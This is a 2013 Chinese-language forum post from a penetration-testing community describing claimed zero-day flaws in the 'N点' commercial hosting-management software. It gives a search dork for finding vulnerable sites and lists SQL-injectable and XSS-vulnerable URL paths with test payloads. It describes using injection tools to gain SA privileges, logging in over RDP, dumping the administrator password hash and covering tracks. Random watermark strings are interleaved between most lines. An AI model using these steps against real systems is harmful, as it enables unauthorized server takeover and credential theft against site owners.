中国网络渗透测试联盟
标题:
N点商业版漏洞通杀0day以及利用方法
[打印本页]
作者:
admin
时间:
2013-3-3 08:06
标题:
N点商业版漏洞通杀0day以及利用方法
不得不说N点实在是一个破东西
* E" {( X9 ^# c) @
就算他开发的商业版,就算商业版附带了安全设置也不能掩饰他的破烂
# m" c' M, Y) y/ u8 ?' P
好吧 抱怨一下就行了 接下来关键的时候到了
/ t$ q5 m6 T& l2 H! D
首先百度搜索关键字:inurl: (mmdatabase.asp)
; A2 H! t- ]6 w s
我随便列举一个:
www.xxxx.com
( u1 g4 e7 j: p2 }1 @% B
修改链接:
http://www.xxxx.com:80/Style/new ... &RID=1&ID=1
) W6 p. `. A: s6 ]7 p
扔入NBSI 或者啊D等各种傻逼工具后
. f g: G) ^$ p- d( ~2 G9 w7 H
你们会看到是SA权限
5 P6 E' @! e/ O U9 z
果断3389 上去 hash得到administrator密码
& g& {0 I; r- i8 G
擦屁股走人~
( l, G. l' l; b/ s) ?* ^0 J6 g" P
经过基友本人测试10个这个程序5个以上有这个漏洞5个里面有一半是SA权限的
) J7 v* O: d0 j- Q* ^; h! ?
% {! k) S! P. U3 x/ r
再附上其他几个漏洞页面
7 z+ y+ {: n4 q+ i6 k, O/ v2 S; B( ]0 {* [' c
SQL:
1 R) Z5 L% {1 H1 z* E
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
1 v0 E# t% \2 T7 I" R. Q
http://www.xxxxxx.com:80/Manage/ ... ogin.asp&PID=11
4 k: L' m" v h5 q) B
http://www.xxxxxx.com:80/Manage/ ... login.asp&PID=9
. r5 L8 b, h7 R
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
- h) |% y! @9 q g
XSS证明:
" ^! I# A4 a& Z8 d$ B# Q6 R
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
! ^* K0 T1 Q; P* ?( |0 `/ ?
http://www.xxxxxx.com:80/Manage/ ... yle/memberlogin.asp
”;alert(42873);”
8 A1 h; O$ L8 K6 Y
http://www.xxxxxx.com:80/Style/d ... mp;checkbox2=.bj.cn
<script>alert(42873)</script>
! o* C8 G: W2 f" F$ G
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
1 Y5 L8 o8 V) W
还是星外吧 你们懂的
) F5 V9 P- q2 W; L F6 _
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
. C3 r1 z6 d& g! u3 }" u" E
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
3 U0 ~4 Y9 O3 u
——-
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2